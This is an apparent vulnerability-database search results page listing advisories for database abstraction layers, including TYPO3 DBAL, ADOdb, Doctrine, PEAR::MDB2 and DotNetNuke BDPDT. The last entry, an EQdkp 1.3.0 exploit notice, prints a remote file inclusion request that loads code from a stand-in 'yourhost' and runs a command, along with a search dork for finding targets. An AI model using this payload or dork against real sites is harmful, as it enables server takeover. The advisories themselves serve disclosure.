15 matches found
Unauthorized Data Exposure
typo3/cms-core is vulnerable to unauthorized data exposure. The vulnerability is due to incomplete access control enforcement where frontend user group restrictions are applied only to the first table in multi-table queries using the database abstraction layer DBAL, allowing attackers to access...
GHSA-X8PV-FGXP-8V3X TYPO3 Allows Information Disclosure via DBAL Restriction Handling
Problem When performing a database query involving multiple tables through the database abstraction layer DBAL, frontend user permissions are only applied via FrontendGroupRestriction to the last table. As a result, data from additional tables included in the same query may be unintentionally...
CVE-2025-47937 TYPO3 Vulnerable to Information Disclosure via DBAL Restriction Handling
TYPO3 is an open source, PHP based web content management system. Starting in version 9.0.0 and prior to versions 9.5.51 ELTS, 10.4.50 ELTS, 11.5.44 ELTS, 12.4.31 LTS, and 13.4.12 LTS, when performing a database query involving multiple tables through the database abstraction layer DBAL, frontend...
CVE-2025-47937 TYPO3 Vulnerable to Information Disclosure via DBAL Restriction Handling
TYPO3 is an open source, PHP based web content management system. Starting in version 9.0.0 and prior to versions 9.5.51 ELTS, 10.4.50 ELTS, 11.5.44 ELTS, 12.4.31 LTS, and 13.4.12 LTS, when performing a database query involving multiple tables through the database abstraction layer DBAL, frontend...
PT-2025-22139 · Typo3 · Typo3
Name of the Vulnerable Software and Affected Versions: TYPO3 versions 9.0.0 through 9.5.50 ELTS TYPO3 versions 10.0.0 through 10.4.49 ELTS TYPO3 versions 11.0.0 through 11.5.43 ELTS TYPO3 versions 12.0.0 through 12.4.30 LTS TYPO3 versions 13.0.0 through 13.4.11 LTS Description: The issue affects...
UBUNTU-CVE-2016-4855
Cross-site scripting vulnerability in ADOdb versions prior to 5.20.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors...
ADOdb vulnerable to cross-site scripting
Overview ADOdb is a database abstraction layer for PHP. The library's test script test.php contains a cross-site scripting CWE-79 vulnerability. ASAI Ken reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. Impact An...
[SECURITY] Fedora 23 Update: php-doctrine-orm-2.4.8-1.fc23
Object relational mapper ORM for PHP that sits on top of a powerful datab ase abstraction layer DBAL. One of its' key features is the option to write database queries in a proprietary object oriented SQL dialect called Doctri ne Query Language DQL, inspired by Hibernate's HQL. This provides...
[SECURITY] Fedora 19 Update: php-doctrine-orm-2.4.2-2.fc19
Object relational mapper ORM for PHP that sits on top of a powerful datab ase abstraction layer DBAL. One of its' key features is the option to write database queries in a proprietary object oriented SQL dialect called Doctri ne Query Language DQL, inspired by Hibernate's HQL. This provides...
[SECURITY] Fedora 20 Update: php-doctrine-orm-2.4.2-2.fc20
Object relational mapper ORM for PHP that sits on top of a powerful datab ase abstraction layer DBAL. One of its' key features is the option to write database queries in a proprietary object oriented SQL dialect called Doctri ne Query Language DQL, inspired by Hibernate's HQL. This provides...
Fedora Update for php-doctrine-Doctrine FEDORA-2011-4098
Check for the Version of php-doctrine-Doctrine OpenVAS Vulnerability Test Fedora Update for php-doctrine-Doctrine FEDORA-2011-4098 Authors: System Generated Check Copyright: Copyright c 2011 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it...
[SECURITY] Fedora 14 Update: php-doctrine-Doctrine-1.2.4-1.fc14
Doctrine is an object relational mapper ORM for PHP 5.2.3+ that sits on t op of a powerful database abstraction layer DBAL. One of its key features is the option to write database queries in a proprietary object oriented SQL diale ct called Doctrine Query Language DQL, inspired by Hibernates HQL...
PEAR::MDB2: Information disclosure
Background PEAR::MDB2 is a database abstraction layer for PHP aimed to provide a common API for all supported relational database management systems. A LOB "large object" is a database field holding binary data. Description priyadi discovered that the request to store a URL string as a LOB is...
BDPDT for DotNetNuke (.net nuke) uploadfilepopup.aspx File Upload Privilege Escalation
The remote host contains BDPDT, a database abstraction layer used in various add-on modules for DotNetNuke. The installed version of the BDPDT contains an ASP.NET script that allows an unauthenticated attacker to gain control of the affected host by allowing uploading arbitrary files with the...
EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion
Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-05-07...